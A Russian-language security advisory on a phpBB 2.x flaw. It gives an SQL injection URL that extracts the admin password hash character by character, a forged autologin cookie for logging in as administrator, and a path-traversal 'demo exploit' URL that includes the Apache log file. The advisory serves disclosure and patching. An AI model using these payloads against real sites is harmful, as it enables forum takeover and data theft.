Административный доступ к PHPbb системе

Дата публикации:
21.02.2003
Всего просмотров:
5135
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpBB 2.x
Описание: В phpBB обнаружена возможность изменения SQL запроса. Удаленный пользователь может получить хеш пароля администратора и, используя его, получить полный контроль над PHPbb системой.

Уязвимость обнаружена в сценарии page_header.php. Например, чтобы взломать user_id '40', запросите следующую страницу:

http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid
(user_password,1,1)=char(97)/*
В результате запрос будет выглядеть следующим образом:
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level, 
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s WHERE 
u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND s.session_page = 
1 or user_id=40 and mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC, 
s.session_ip ASC
Имя администратора системы можно просмотреть вверху списка пользователей внизу страницы форума. Далее добавляя хеш пароля в куки, можно войти на сайт как администратор системы. Например, если user_id равен 32360, и хеш пароля - 6a204bd89f3c8348afd5c77c717a097a, то атакующий должен добавить следующее значение:
 
a:2:

{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:

5:"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
Затем urlencode() это и поместите в куки с переменной 'phpbb2support_data', затем обратитесь к административной странице на phpbb сайте. Демонстрационный эксплоит:
 
http://[target]/phpBB/prefs.php?HTTP_POST_VARS[save]
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disbbco
de=0&themes =1&lang=/../../../var/logs/apache/access.log%00
&save=1&user=admin&submit=Save%20Preferences

Уязвимость обнаружена в phpBB 2.0,2.01, 2.02 и устранена в 2.03

Ссылки: phpBB Security Bugs

или введите имя

CAPTCHA